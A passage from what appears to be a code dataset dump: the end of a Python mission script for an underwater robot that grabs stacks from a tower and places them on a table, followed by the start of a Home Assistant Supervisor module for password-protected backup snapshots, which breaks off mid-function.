world.set(w)\n\n initial_depth = shm.kalman.depth.get()\n get_stack = lambda: Retry(lambda: GetStack(vision), self.get_stack_retries)\n\n self.task = SequentialSuccess(subtasks=(\n [Retry(lambda: SequentialSuccess(\n Log('Performing initial surface'),\n MoveAboveTower(vision),\n Surface(),\n ), self.initial_surface_retries)] +\n [SequentialSuccess(\n get_stack(),\n Surface(),\n MoveAwayFromWall() if i == 0 else NoOp(),\n PlaceStack(vision)) for i in range(4)] +\n [Log('Finished recovery, returning to original depth'), Depth(initial_depth)]\n ))\n\n def on_run(self, vision, *args, **kwargs):\n if world.spiral_search_timed_out.get():\n self.loge('Timed out spiral search, exiting')\n self.finish()\n return\n\n if not self.task.finished:\n self.task()\n else:\n self.finish()\n if self.task.success:\n self.logi('Success!')\n else:\n self.loge('Failure :(')\n\n def on_finish(self, *args, **kwargs):\n RetractAmlan()()\n\nclass GetStack(Task):\n \"\"\"\n Pick up one stack from the tower, including moving to the tower and grabbing a stack\n \"\"\"\n def on_first_run(self, vision, *args, **kwargs):\n self.success = False\n self.choose_and_grab = ChooseAndGrab(vision)\n self.task = SequentialSuccess(\n MoveAboveTower(vision),\n self.choose_and_grab,\n )\n\n def on_run(self, vision, *args, **kwargs):\n if not self.task.finished:\n self.task()\n else:\n self.success = self.task.success\n self.finish(vision)\n\n def on_finish(self, vision, *args, **kwargs):\n if self.success:\n self.logi('Successfully grabbed stack!')\n world.stacks_on_tower.set(sum(s is not None for s in vision.stacks))\n choice = self.choose_and_grab.grab_choice\n world.grabber_stack_present.set(1)\n world.grabber_stack_red.set(choice.red)\n if choice.heading is not None:\n world.first_hstack_removed.set(1)\n world.second_hstack_heading.set((choice.heading + 180) % 360)\n else:\n self.loge('Failed to grab stack')\n RetractAmlan()()\n\nclass ChooseAndGrab(Task):\n \"\"\"\n Choose a stack and try to grab it\n\n Begin: above tower looking at stacks\n \"\"\"\n def on_first_run(self, vision, *args, **kwargs):\n self.success = False\n self.grab_choice = choose_next_stack(vision)\n if self.grab_choice.error_msg is not None:\n self.loge(self.grab_choice.error_msg)\n self.finish()\n return\n self.logi('Chose to grab {} {} stack at index {}'.format(\n 'red' if self.grab_choice.red else 'green',\n 'vertical' if self.grab_choice.vertical else 'horizontal',\n self.grab_choice.index,\n ))\n\n grab_task = None\n if self.grab_choice.vertical:\n grab_task = GrabVerticalStack(vision, self.grab_choice.index)\n else:\n grab_task = GrabHorizontalStack(\n vision, self.grab_choice.index, self.grab_choice.heading)\n\n initial_stacks = sum(stack is not None and stack.visible for stack in vision.stacks)\n self.task = SequentialSuccess(\n GrabAndRestore(vision, grab_task),\n VerifyGrab(vision, initial_stacks),\n )\n\n def on_run(self, vision, *args, **kwargs):\n if self.has_ever_finished:\n return\n if not self.task.finished:\n self.task()\n else:\n self.success = self.task.success\n self.finish()\n\nclass GrabAndRestore(Task):\n \"\"\"\n Attempt to grab a stack and restore our initial position after\n \"\"\"\n def on_first_run(self, vision, grab_task, *args, **kwargs):\n self.success = False\n\n north, east, depth = aslam.sub.position()\n self.task = Sequential(\n grab_task,\n\n Log('Moving to position before grab attempt'),\n Depth(depth),\n GoToPosition(north, east, optimize=False),\n )\n\n def on_run(self, vision, grab_task, *args, **kwargs):\n if not self.task.finished:\n self.task()\n else:\n self.success = grab_task.success\n self.finish()\n\nclass VerifyGrab(Task):\n \"\"\"\n Check if the number of stacks on the tower is less than what we started\n with\n \"\"\"\n def on_first_run(self, vision, original_stacks, *args, **kwargs):\n if original_stacks > 1:\n self.downward_target = SequentialSuccess(\n DownwardTargetObjects(vision, lambda: vision.stacks),\n Zero(),\n )\n else:\n self.downward_target = Success(Log('Not targeting stacks to verify grab, none should remain'))\n\n def on_run(self, vision, original_stacks, *args, **kwargs):\n if not self.downward_target.finished:\n self.downward_target()\n else:\n current_stacks = sum(stack is not None for stack in vision.stacks)\n self.success = self.downward_target.success and current_stacks < original_stacks\n if not self.success:\n self.loge('Grab failed, started with {} stacks but {} remain'.format(\n original_stacks, current_stacks))\n\n # TODO fix\n # self.success = True\n self.finish()\n\nclass Search(Task):\n def on_first_run(self, *args, **kwargs):\n self.task = Timeout(Sequential(\n # Pause initially to give object-identifying tasks time to check current state\n Timer(0.5), SpiralSearch(\n relative_depth_range=0,\n optimize_heading=True,\n meters_per_revolution=1,\n min_spin_radius=1,\n )), 120)\n\n def on_run(self, *args, **kwargs):\n if not self.task.finished:\n self.task()\n elif not self.task.success:\n self.loge('Timed out while spiral searching')\n world.spiral_search_timed_out.set(1)\n\nclass MoveAboveTower(Task):\n \"\"\"\n Move to above the tower as quickly as possible given the current known information\n \"\"\"\n # TODO: support pinger tracking\n min_search_stacks = 2\n default_altitude = 2.8\n\n def on_first_run(self, vision, *args, **kwargs):\n self.success = False\n\n stacks_on_tower = world.stacks_on_tower.get()\n go_to_tower = None\n if stacks_on_tower < 4: # Only rely on tower position after we've picked up a stack\n north = world.tower_north.get()\n east = world.tower_east.get()\n depth = world.tower_depth.get()\n\n go_to_tower = Sequential(\n Log('Returning to tower position ({}, {}, {})'.format(north, east, depth)),\n Depth(depth), # Move to tower depth early so we don't crash into tower\n GoToPosition(north, east, optimize=True),\n )\n\n else:\n go_to_tower = Sequential(\n Log('Going to default tower altitude of {}'.format(self.default_altitude)),\n Altitude(self.default_altitude),\n )\n\n search_tower = None\n if stacks_on_tower > 0:\n search_stacks = 2 if stacks_on_tower == 4 else 1\n search_tower = Sequential(\n Log('Searching for tower'),\n Altitude(self.default_altitude),\n MasterConcurrent(\n IdentifyObjects(lambda: vision.stacks, min_objects=search_stacks),\n Search(),\n ),\n )\n else:\n search_tower = Log('Not searching for tower, no stacks on tower')\n\n center_tower = None\n if stacks_on_tower > 0:\n center_tower = SequentialSuccess(\n Log('Centering tower'),\n DownwardTargetObjects(vision, lambda: vision.stacks),\n Zero(),\n )\n else:\n center_tower = Log('No stacks on tower, not centering')\n\n self.task = SequentialSuccess(go_to_tower, search_tower, center_tower)\n\n def on_run(self, vision, *args, **kwargs):\n if not self.task.finished:\n self.task()\n\n else:\n if self.task.success:\n self.success = True\n north, east, depth = aslam.sub.position()\n world.tower_north.set(north)\n world.tower_east.set(east)\n world.tower_depth.set(depth)\n else:\n self.loge('Failed to move above tower')\n\n self.finish()\n\nclass IdentifyObjects(Task):\n \"\"\"\n Finish when some objects we are looking for are in view\n \"\"\"\n def on_run(self, objects_func, min_objects=1, *args, **kwargs):\n n = sum(obj is not None and obj.visible for obj in objects_func())\n if n >= min_objects:\n self.finish()\n\nclass DownwardTargetObjects(Task):\n \"\"\"\n Downward target the center of all provided objects\n\n Begin: at least one object in view\n End: center of all objects in center of camera\n \"\"\"\n ps = [0.002, 0.002, 0.001]\n deadbands = [(40, 40), (30, 30), (20, 20)]\n\n def centroid(self, objects):\n total_objects = 0\n center_x, center_y = 0, 0\n for obj in objects:\n if obj is not None and obj.visible:\n center_x += obj.x\n center_y += obj.y\n total_objects += 1\n\n center_x /= total_objects\n center_y /= total_objects\n return (center_x, center_y)\n\n def on_first_run(self, vision, objects_func, precision=0, *args, **kwargs):\n self.task = ConsistentTask(DownwardTarget(\n point=lambda: self.centroid(self.objects),\n target=vision.cam_center,\n deadband=self.deadbands[precision],\n px=self.ps[precision],\n py=self.ps[precision],\n ))\n\n def on_run(self, vision, objects_func, *args, **kwargs):\n self.success = False\n\n self.objects = objects_func()\n num_objects = sum(obj is not None and obj.visible for obj in self.objects)\n if num_objects == 0:\n self.loge(\"Can't see any objects, targeting aborted\")\n self.finish()\n return\n\n self.task()\n if self.task.finished:\n self.success = True\n self.finish()\n\nGrabChoice = namedtuple('GrabChoice', ['error_msg', 'index', 'red', 'vertical', 'heading'])\n\ndef choose_next_stack(vision):\n \"\"\"\n Decide which stack to grab on the tower\n\n Current stack schedule: Pick up all vertical stacks, then all horizontal stacks.\n Needs to above the tower with all stacks in vision.\n \"\"\"\n HORIZONTAL_ASPECT_RATIO = 2\n\n failedChoice = lambda info: GrabChoice(info, None, None, None, None)\n\n vstack_indices, hstack_indices = [], []\n for i, stack in enumerate(vision.stacks):\n if stack is not None:\n if stack.aspect_ratio >= HORIZONTAL_ASPECT_RATIO:\n hstack_indices.append(i)\n else:\n vstack_indices.append(i)\n\n target_indices = None\n if len(hstack_indices) == 2 or \\\n (len(hstack_indices) == 1 and world.first_hstack_removed.get()):\n target_indices = hstack_indices\n else:\n target_indices = vstack_indices\n if len(target_indices) == 0:\n return failedChoice('No stacks found to grab')\n if len(target_indices) > 2:\n # return failedChoice('More than 2 {} stacks found, cannot grab'.format(\n # 'vertical' if target_indices is vstack_indices else 'horizontal'))\n target_indices = target_indices[:2]\n\n target_index = target_indices[int(random.random() * len(target_indices))]\n target_stack = vision.stacks[target_index]\n\n heading = None\n if target_index in hstack_indices:\n if len(hstack_indices) == 2:\n target_pos = np.array([target_stack.x, target_stack.y])\n other_index = None\n if target_index == hstack_indices[0]:\n other_index = hstack_indices[1]\n else:\n other_index = hstack_indices[0]\n other_stack = vision.stacks[other_index]\n\n avg_pos = np.array([\n (target_stack.x + other_stack.x) / 2,\n (target_stack.y + other_stack.y) / 2,\n ])\n stack_vec = target_pos - avg_pos\n\n heading = None\n heading = math.degrees(math.atan2(stack_vec[0], -stack_vec[1]))\n heading += shm.kalman.heading.get() # Now a global heading\n heading -= 90 # Align to the stack on the port side\n heading %= 360\n\n elif len(hstack_indices) == 1:\n heading = world.second_hstack_heading.get()\n\n return GrabChoice(\n error_msg=None,\n index=target_index,\n red=target_stack.red,\n vertical=target_index in vstack_indices,\n heading=heading,\n )\n\nclass GradualHeading(Task):\n relative_desire = 15\n deadband = 25\n\n def on_run(self, desire, *args, **kwargs):\n current = shm.kalman.heading.get()\n diff = heading_sub_degrees(desire, current)\n relative = math.copysign(self.relative_desire, diff)\n RelativeToCurrentHeading(relative)()\n if abs(diff) < self.deadband:\n self.finish()\n\nclass RelativeGradualDepth(Task):\n relative_desire = 0.2\n deadband = 0.05\n\n def on_first_run(self, offset, *args, **kwargs):\n self.desire = shm.kalman.depth.get() + offset\n\n def on_run(self, *args, **kwargs):\n diff = self.desire - shm.kalman.depth.get()\n relative = math.copysign(self.relative_desire, diff)\n RelativeToCurrentDepth(relative)()\n if abs(diff) < self.deadband:\n self.finish()\n\nclass GrabStack(Task):\n \"\"\"\n Grabs the stack at the given index at the given approximate heading\n \"\"\"\n align_p = 0.5\n align_deadband = 3\n scooch_retries = 20\n\n def on_first_run(self, vision, stack_i, timeout, dive_task, offset_task=None, approx_heading=None, snap_move=None, slide_move=None, *args, **kwargs):\n self.success = False\n self.must_see_stack = True\n initial_stack = vision.stacks[stack_i]\n if initial_stack is None:\n return\n self.color = 'red' if initial_stack.red else 'green'\n\n downward_target = lambda precision=0: DownwardTargetObjects(vision, lambda: [vision.stacks[stack_i]], precision=precision)\n precise_align = PIDLoop(\n lambda: vision.stacks[stack_i].angle,\n RelativeToCurrentHeading(),\n target=90,\n negate=True,\n p=self.align_p,\n deadband=self.align_deadband,\n )\n\n def ignore_stack():\n self.must_see_stack = False\n\n self.task = Timeout(SequentialSuccess(\n Log('Aligning to stack'),\n downward_target(),\n Zero(),\n\n Log('Going down and precisely aligning to stack'),\n Concurrent(\n Sequential(\n GradualHeading(approx_heading),\n precise_align,\n finite=False,\n ) if approx_heading is not None else NoOp(),\n downward_target(precision=2),\n dive_task,\n finite=False,\n ),\n PositionalControl(),\n Zero(),\n\n FunctionTask(ignore_stack),\n Sequential(\n Log('Applying offset'),\n offset_task,\n ) if offset_task is not None else NoOp(),\n\n Log('Moving to stack'),\n snap_move if snap_move is not None else NoOp(),\n\n Log('Scooching away from stack'),\n Scooch(lambda: vision.blockers[self.color]),\n\n Log('Extending Amlan'),\n ExtendAmlan(),\n Timer(2),\n\n Log('Sliding stack'),\n Success(Timeout(slide_move, 10)) if slide_move is not None else NoOp(),\n\n Log('Hopefully grabbed stack'),\n ), timeout)\n\n def on_run(self, vision, stack_i, timeout, *args, **kwargs):\n if self.must_see_stack and vision.stacks[stack_i] is None:\n self.loge('Lost stack')\n Zero()()\n self.finish()\n return\n\n if not self.task.finished:\n self.task()\n else:\n self.finish()\n if self.task.success:\n self.success = True\n else:\n self.loge('Failed grab')\n\nclass ConsistentTask(Task):\n \"\"\"\n Checks to make sure a non-finite task consistently is finished\n \"\"\"\n def on_first_run(self, task, success=18, total=20, *args, **kwargs):\n self.cons_check = ConsistencyCheck(success, total)\n\n def on_run(self, task, *args, **kwargs):\n task()\n if self.cons_check.check(task.finished):\n self.finish()\n\nMoveGrabberToCamera = lambda: ConsistentTask(MoveXY((-0.04064, 0.1), deadband=0.015))\n\ndef GrabVerticalStack(vision, stack_i):\n return GrabStack(\n vision, stack_i,\n timeout=60,\n dive_task=Altitude(constants.stack_dive_altitude),\n offset_task=MoveGrabberToCamera(),\n snap_move=Altitude(constants.vstack_grab_altitude),\n )\n\ndef GrabHorizontalStack(vision, stack_i, approx_heading):\n return GrabStack(\n vision, stack_i,\n timeout=90,\n dive_task=Altitude(constants.stack_dive_altitude),\n offset_task=MoveGrabberToCamera(),\n approx_heading=approx_heading,\n snap_move=Altitude(constants.hstack_grab_altitude),\n slide_move=MoveY(0.4),\n )\n\nclass Altitude(Task):\n min_depth = 0.5\n\n def on_first_run(self, altitude, p=0.5, d=0.1, *args, **kwargs):\n self.task = PIDLoop(\n shm.dvl.savg_altitude.get,\n RelativeToCurrentDepth(),\n target=altitude,\n p=p,\n d=d,\n negate=True,\n deadband=0.05,\n )\n\n def on_run(self, *args, **kwargs):\n if not self.task.finished:\n self.task()\n if shm.navigation_desires.depth.get() < self.min_depth:\n self.loge('Min depth reached, preventing surface and exiting')\n shm.navigation_desires.depth.set(self.min_depth)\n self.finish()\n else:\n self.finish()\n\nclass AltitudeUntilStop(Task):\n \"\"\"\n Attempt to move to the target altitude until the sub gets stuck\n \"\"\"\n def on_first_run(self, altitude, *args, **kwargs):\n self.min_speed = 0.008\n self.min_delta = 0.1\n self.deque_size = 20\n\n self.success = False\n self.altitude_task = Altitude(altitude, p=0.3)\n self.stop_cons_check = ConsistencyCheck(3, 3)\n self.readings = deque()\n self.initial_altitude = shm.dvl.savg_altitude.get()\n self.last_altitude = self.initial_altitude\n\n def on_run(self, altitude, *args, **kwargs):\n if not self.altitude_task.has_ever_finished:\n self.altitude_task()\n current_altitude = shm.dvl.savg_altitude.get()\n self.readings.append((current_altitude, time.time()))\n if len(self.readings) > self.deque_size:\n self.readings.popleft()\n\n if abs(current_altitude - self.initial_altitude) >= self.min_delta and \\\n len(self.readings) >= self.deque_size:\n delta_altitude = self.readings[-1][0] - self.readings[0][0]\n delta_time = self.readings[-1][1] - self.readings[0][1]\n speed = abs(delta_altitude / delta_time)\n\n if self.stop_cons_check.check(speed < self.min_speed):\n self.logi('Stopped changing altitude, finishing')\n self.success = True\n self.finish()\n else:\n self.loge('Bounding altitude reached')\n self.finish()\n\nclass Scooch(Task):\n \"\"\"\n Scooch over to the right a little and check if we still see a blocking\n stack\n \"\"\"\n distance_inc = 0.01\n max_distance = 0.5\n\n def on_first_run(self, blocking_func, *args, **kwargs):\n self.success = False\n self.distance_checker = CheckDistance(self.max_distance)\n\n def on_run(self, blocking_func, *args, **kwargs):\n if blocking_func() is None:\n self.success = True\n self.finish()\n\n if not self.distance_checker.finished:\n MoveY(self.distance_inc)()\n self.distance_checker()\n else:\n self.loge('Scooched too far, stack still blocking')\n self.finish()\n\n def on_finish(self, *args, **kwargs):\n Zero()()\n\nclass Wiggle(Task):\n def on_first_run(self, *args, **kwargs):\n self.task = Sequential(\n MoveX(-0.05, deadband=0.03),\n MoveX(0.1, deadband=0.04),\n MoveX(-0.1, deadband=0.04),\n MoveX(0.1, deadband=0.04),\n MoveX(-0.1, deadband=0.04),\n MoveX(0.1, deadband=0.04),\n MoveX(-0.1, deadband=0.04),\n MoveX(0.05, deadband=0.03),\n )\n\n def on_run(self, *args, **kwargs):\n if not self.task.finished:\n self.task()\n else:\n self.finish()\n\nclass Surface(Task):\n \"\"\"\n Breaches the surface of the water inside the octogon for a fixed time\n\n Begin: Sub centered and zeroed directly over tower\n End: Sub slightly below surface\n \"\"\"\n # Don't surface to a negative depth, it pushes bubbles under the sub onto the camera and dvl\n pre_surface_depth = 0.5\n surface_depth = 0\n surface_time = 3\n\n def on_first_run(self, *args, **kwargs):\n original_depth = shm.kalman.depth.get()\n\n self.task = Sequential(\n Log('Rising to just below surface'),\n PositionalControl(),\n Depth(self.pre_surface_depth),\n\n Log('Surfacing!'),\n MasterConcurrent(Timer(self.surface_time), Depth(self.surface_depth)),\n\n Log('Falling back below surface'),\n Depth(original_depth),\n )\n\n def on_run(self, *args, **kwargs):\n if not self.task.finished:\n self.task()\n else:\n self.finish()\n\nMoveAwayFromWall = lambda: Sequential(\n Log('Moving away from wall'),\n Heading(WALL_TOWER_HEADING),\n MoveX(2),\n)\n\nclass PlaceStack(Task):\n \"\"\"\n Locate the table and place the stack we're holding on it\n\n Begin: holding a stack\n End: above the table after placing stack\n \"\"\"\n move_above_table_retries = 10\n drop_stack_retries = 4\n\n def on_first_run(self, vision, *args, **kwargs):\n self.task = SequentialSuccess(\n Log('Moving above table'),\n Retry(lambda: MoveAboveTable(vision), self.move_above_table_retries),\n\n Log('Dropping stack'),\n Conditional(Retry(lambda: DropStack(vision), self.drop_stack_retries), on_failure=Sequential(\n Log('Failed to drop stack normally, performing blind drop', level='error'),\n DropStack(vision, blind=True),\n )),\n )\n\n def on_run(self, vision, *args, **kwargs):\n if not self.task.finished:\n self.task()\n else:\n self.finish()\n\n def on_finish(self, *args, **kwargs):\n self.success = self.task.success\n if self.success:\n world.stacks_on_table.set(world.stacks_on_table.get() + 1)\n else:\n self.loge('Failed to place stack')\n\nclass MoveAboveTable(Task):\n \"\"\"\n Move to above the table as quickly as possible given the current known information\n\n Start: Anywhere\n End: Zeroed centered on the table\n \"\"\"\n default_altitude = 2.6\n\n def on_first_run(self, vision, *args, **kwargs):\n self.success = False\n\n if world.stacks_on_table.get() > 0:\n north = world.table_north.get()\n east = world.table_east.get()\n depth = world.table_depth.get()\n\n self.task = SequentialSuccess(\n Log('Returning to table position ({}, {}, {})'.format(north, east, depth)),\n GoToPosition(north, east, optimize=True),\n Depth(depth), # Move to table depth late so we don't crash into tower\n\n Log('Searching for table'),\n MasterConcurrent(IdentifyObjects(lambda: [vision.table]), Search()),\n\n Log('Centering table'),\n DownwardTargetObjects(vision, lambda: [vision.table]),\n Zero(),\n )\n\n else:\n def record_position():\n north, east, depth = aslam.sub.position()\n world.table_north.set(north)\n world.table_east.set(east)\n world.table_depth.set(depth)\n\n self.task = SequentialSuccess(\n Log('Searching for table'),\n MasterConcurrent(IdentifyObjects(lambda: [vision.table]), Search()),\n\n Log('Centering table'),\n DownwardTargetObjects(vision, lambda: [vision.table]),\n\n Log('Moving to default table altitude'),\n Altitude(self.default_altitude),\n\n # Log('Centering colored table regions'),\n # DownwardTargetObjects(vision, lambda: vision.regions, precision=1),\n # Zero(),\n\n Log('Recording table position'),\n FunctionTask(record_position),\n )\n\n def on_run(self, vision, *args, **kwargs):\n if not self.task.finished:\n self.task()\n\n else:\n if self.task.success:\n self.success = True\n\n # The best time to record position is if we've never placed a\n # stack\n if world.stacks_on_table.get() == 0:\n north, east, depth = aslam.sub.position()\n world.table_north.set(north)\n world.table_east.set(east)\n world.table_depth.set(depth)\n else:\n self.loge('Failed to move above table')\n\n self.finish()\n\nclass DropStack(Task):\n \"\"\"\n Try dropping the stack we're holding on the given mark color once\n\n Start: target mark visible in downcam\n End: above the table with stack dropped, or not\n \"\"\"\n precise_align_altitude = 1.6\n drop_altitude = 0.6\n retract_amlan_time = 1\n after_drop_depth_delta = -0.5\n\n def on_first_run(self, vision, blind=False, *args, **kwargs):\n self.success = False\n\n if not world.grabber_stack_present.get():\n self.loge('No stack present in grabber, cannot drop')\n self.finish()\n red = world.grabber_stack_red.get()\n\n def empty_grabber():\n world.grabber_stack_present.set(0)\n\n target_region = lambda precision=0: DownwardTargetObjects(\n vision, lambda: [vision.regions[0 if red else 1]], precision=precision)\n\n self.task = SequentialSuccess(\n SequentialSuccess(\n Log('Targeting {} region'.format('red' if red else 'green')),\n target_region(),\n\n Log('Going down to target region more accurately'),\n Concurrent(\n Altitude(self.precise_align_altitude),\n target_region(precision=2),\n finite=False,\n ),\n ) if not blind else NoOp(),\n\n PositionalControl(),\n Zero(),\n\n Log('Aligning target with grabber'),\n MoveGrabberToCamera(),\n\n Log('Going down to drop'),\n Altitude(self.drop_altitude),\n\n Log('Retracting Amlan'),\n RetractAmlan(),\n Timer(self.retract_amlan_time),\n FunctionTask(empty_grabber),\n\n Log('Moving up away from table slowly'),\n RelativeGradualDepth(self.after_drop_depth_delta),\n )\n\n def on_run(self, vision, *args, **kwargs):\n if self.has_ever_finished:\n return\n\n if not self.task.finished:\n self.task()\n else:\n self.success = self.task.success\n self.finish()\n if not self.success:\n self.loge('Failed to drop stack')\n\nclass VisionTask(Task):\n def on_first_run(self, task_class, *args, **kwargs):\n self.vision = Vision()\n task = task_class(self.vision, *args, **kwargs)\n self.task = Sequential(Timer(1), task)\n\n def on_run(self, *args, **kwargs):\n if not self.task.finished:\n try:\n camera = get_downward_camera()\n self.vision(camera)\n self.task()\n except RuntimeError:\n self.loge('Vision not running, refusing to run mission')\n else:\n self.finish()\n\ndef SimulatedTask(task):\n def update_altitude():\n shm.dvl.savg_altitude.set(3 - shm.kalman.depth.get())\n\n return MasterConcurrent(task, FunctionTask(update_altitude, finite=False))\n\nclass OptimalRecovery(Task):\n def desiredModules(self):\n return [shm.vision_modules.Recovery]\n\n def on_first_run(self):\n self.subtask = recovery()\n self.has_made_progress = True\n # TODO @AlexO Update when we've made progress! (first successful center on tower? first grabbed stack confirmed?)\n\n def on_run(self):\n self.subtask()\n if self.subtask.finished:\n self.finish()\n\nclass DownCalibrate(Task):\n def on_first_run(self, vision, stack_i, *args, **kwargs):\n self.align = DownwardTargetObjects(vision, lambda: [vision.stacks[stack_i]])\n\n def on_run(self, *args, **kwargs):\n self.align()\n if self.align.finished and not self.align.success:\n VelocityX(0)()\n VelocityY(0)()\n\nclass IdentifyTowerByPinger(Task):\n def on_first_run(self, vision, *args, **kwargs):\n self.task = ConsistentTask(IdentifyObjects(lambda: vision.stacks, min_objects=3), 28, 30)\n\n def on_run(self, *args, **kwargs):\n if not self.task.finished:\n self.task()\n else:\n self.finish()\n\nidentify_tower_by_pinger = lambda: VisionTask(IdentifyTowerByPinger)\n\nrecovery = lambda: VisionTask(Recovery)\nrecovery_noreset = lambda: VisionTask(Recovery, reset=False)\nsim_recovery = lambda: SimulatedTask(recovery())\nvision = lambda: Vision(get_downward_camera())\ngrab_vstack = lambda: VisionTask(GrabVerticalStack, 1)\nsim_grab_vstack = lambda: SimulatedTask(grab_vstack())\ngrab_hstack = lambda: VisionTask(GrabHorizontalStack, 3, 0)\naltitude_until_stop = lambda: AltitudeUntilStop(1)\nmove = lambda: MoveXYRough((-1, 0.5))\ngo_to_position = lambda: GoToPosition(0, 0, optimize=True)\naltitude = lambda: Sequential(Altitude(2), Altitude(3), Altitude(3.5), Altitude(4))\n\nsim_move_above_tower = lambda: SimulatedTask(VisionTask(MoveAboveTower))\nsim_get_stack = lambda: SimulatedTask(VisionTask(GetStack))\nsequential_success = lambda: SequentialSuccess(Timeout(NoOp(finite=False), 1), Log('next'))\n\ndef load_grabber():\n world.grabber_stack_present.set(1)\nplace_stack = lambda: Sequential(FunctionTask(load_grabber), VisionTask(PlaceStack))\n\nsim_place_stack = lambda: SimulatedTask(VisionTask(PlaceStack))\nsurface = lambda: Surface()\n\ncalibrate = VisionTask(DownCalibrate, 1)\nconditional = Conditional(NoOp(), on_failure=Log('oh no'))\ngradual = lambda: RelativeGradualDepth(-0.5)\n","sub_path":"mission/missions/recovery.py","file_name":"recovery.py","file_ext":"py","file_size_in_byte":38928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"494032025","text":"\"\"\"Representation of a snapshot file.\"\"\"\nimport asyncio\nfrom base64 import b64decode, b64encode\nimport json\nimport logging\nfrom pathlib import Path\nimport tarfile\nfrom tempfile import TemporaryDirectory\nfrom typing import Any, Dict, Optional\n\nfrom cryptography.hazmat.backends import default_backend\nfrom cryptography.hazmat.primitives import padding\nfrom cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\nimport voluptuous as vol\nfrom voluptuous.humanize import humanize_error\n\nfrom ..const import (\n ATTR_ADDONS,\n ATTR_AUDIO_INPUT,\n ATTR_AUDIO_OUTPUT,\n ATTR_BOOT,\n ATTR_CRYPTO,\n ATTR_DATE,\n ATTR_FOLDERS,\n ATTR_HOMEASSISTANT,\n ATTR_IMAGE,\n ATTR_LAST_VERSION,\n ATTR_NAME,\n ATTR_PORT,\n ATTR_PROTECTED,\n ATTR_REFRESH_TOKEN,\n ATTR_REPOSITORIES,\n ATTR_SIZE,\n ATTR_SLUG,\n ATTR_SSL,\n ATTR_TYPE,\n ATTR_VERSION,\n ATTR_WAIT_BOOT,\n ATTR_WATCHDOG,\n CRYPTO_AES128,\n FOLDER_HOMEASSISTANT,\n)\nfrom ..coresys import CoreSys, CoreSysAttributes\nfrom ..exceptions import AddonsError\nfrom ..utils.json import write_json_file\nfrom ..utils.tar import SecureTarFile, exclude_filter, secure_path\nfrom .utils import key_to_iv, password_for_validating, password_to_key, remove_folder\nfrom .validate import ALL_FOLDERS, SCHEMA_SNAPSHOT\n\n_LOGGER: logging.Logger = logging.getLogger(__name__)\n\nMAP_FOLDER_EXCLUDE = {\n FOLDER_HOMEASSISTANT: [\n \"*.db-wal\",\n \"*.db-shm\",\n \"__pycache__/*\",\n \"*.log\",\n \"OZW_Log.txt\",\n ]\n}\n\n\nclass Snapshot(CoreSysAttributes):\n \"\"\"A single Supervisor snapshot.\"\"\"\n\n def __init__(self, coresys: CoreSys, tar_file: Path):\n \"\"\"Initialize a snapshot.\"\"\"\n self.coresys: CoreSys = coresys\n self._tarfile: Path = tar_file\n self._data: Dict[str, Any] = {}\n self._tmp = None\n self._key: Optional[bytes] = None\n self._aes: Optional[Cipher] = None\n\n @property\n def slug(self):\n \"\"\"Return snapshot slug.\"\"\"\n return self._data.get(ATTR_SLUG)\n\n @property\n def sys_type(self):\n \"\"\"Return snapshot type.\"\"\"\n return self._data.get(ATTR_TYPE)\n\n @property\n def name(self):\n \"\"\"Return snapshot name.\"\"\"\n return self._data[ATTR_NAME]\n\n @property\n def date(self):\n \"\"\"Return snapshot date.\"\"\"\n return self._data[ATTR_DATE]\n\n @property\n def protected(self):\n \"\"\"Return snapshot date.\"\"\"\n return self._data.get(ATTR_PROTECTED) is not None\n\n @property\n def addons(self):\n \"\"\"Return snapshot date.\"\"\"\n return self._data[ATTR_ADDONS]\n\n @property\n def addon_list(self):\n \"\"\"Return a list of add-ons slugs.\"\"\"\n return [addon_data[ATTR_SLUG] for addon_data in self.addons]\n\n @property\n def folders(self):\n \"\"\"Return list of saved folders.\"\"\"\n return self._data[ATTR_FOLDERS]\n\n @property\n def repositories(self):\n \"\"\"Return snapshot date.\"\"\"\n return self._data[ATTR_REPOSITORIES]\n\n @repositories.setter\n def repositories(self, value):\n \"\"\"Set snapshot date.\"\"\"\n self._data[ATTR_REPOSITORIES] = value\n\n @property\n def homeassistant_version(self):\n \"\"\"Return snapshot Home Assistant version.\"\"\"\n return self._data[ATTR_HOMEASSISTANT].get(ATTR_VERSION)\n\n @property\n def homeassistant(self):\n \"\"\"Return snapshot Home Assistant data.\"\"\"\n return self._data[ATTR_HOMEASSISTANT]\n\n @property\n def size(self):\n \"\"\"Return snapshot size.\"\"\"\n if not self.tarfile.is_file():\n return 0\n return round(self.tarfile.stat().st_size / 1048576, 2) # calc mbyte\n\n @property\n def is_new(self):\n \"\"\"Return True if there is new.\"\"\"\n return not self.tarfile.exists()\n\n @property\n def tarfile(self):\n \"\"\"Return path to Snapshot tarfile.\"\"\"\n return self._tarfile\n\n def new(self, slug, name, date, sys_type, password=None):\n \"\"\"Initialize a new snapshot.\"\"\"\n # Init metadata\n self._data[ATTR_SLUG] = slug\n self._data[ATTR_NAME] = name\n self._data[ATTR_DATE] = date\n self._data[ATTR_TYPE] = sys_type\n\n # Add defaults\n self._data = SCHEMA_SNAPSHOT(self._data)\n\n # Set password\n if password:\n self._init_password(password)\n self._data[ATTR_PROTECTED] = password_for_validating(password)\n self._data[ATTR_CRYPTO] = CRYPTO_AES128\n\n def set_password(self, password: str) -> bool:\n \"\"\"Set the password for an existing snapshot.\"\"\"\n if not password:\n return False\n\n validating = password_for_validating(password)\n if validating != self._data[ATTR_PROTECTED]:\n return False\n\n self._init_password(password)\n return True\n\n def _init_password(self, password: str) -> None:\n \"\"\"Set password + init aes cipher.\"\"\"\n self._key = password_to_key(password)\n self._aes = Cipher(\n algorithms.AES(self._key),\n modes.CBC(key_to_iv(self._key)),\n backend=default_backend(),\n )\n\n def _encrypt_data(self, data: str) -> str:\n \"\"\"Make data secure.\"\"\"\n if not self._key or data is None:\n return data\n\n encrypt = self._aes.encryptor()\n padder = padding.PKCS7(128).padder()\n\n data = padder.update(data.encode()) + padder.finalize()\n return b64encode(encrypt.update(data)).decode()\n\n def _decrypt_data(self, data: str) -> str:\n \"\"\"Make data readable.\"\"\"\n if not self._key or data is None:\n return data\n\n decrypt = self._aes.decryptor()\n padder = padding.PKCS7(128).unpadder()\n\n data = padder.update(decrypt.update(b64decode(data))) + padder.finalize()\n return data.decode()\n\n async def load(self):\n \"\"\"Read snapshot.json from tar file.\"\"\"\n if not self.tarfile.is_file():\n _LOGGER.error(\"No tarfile %s\", self.tarfile)\n return False\n\n def 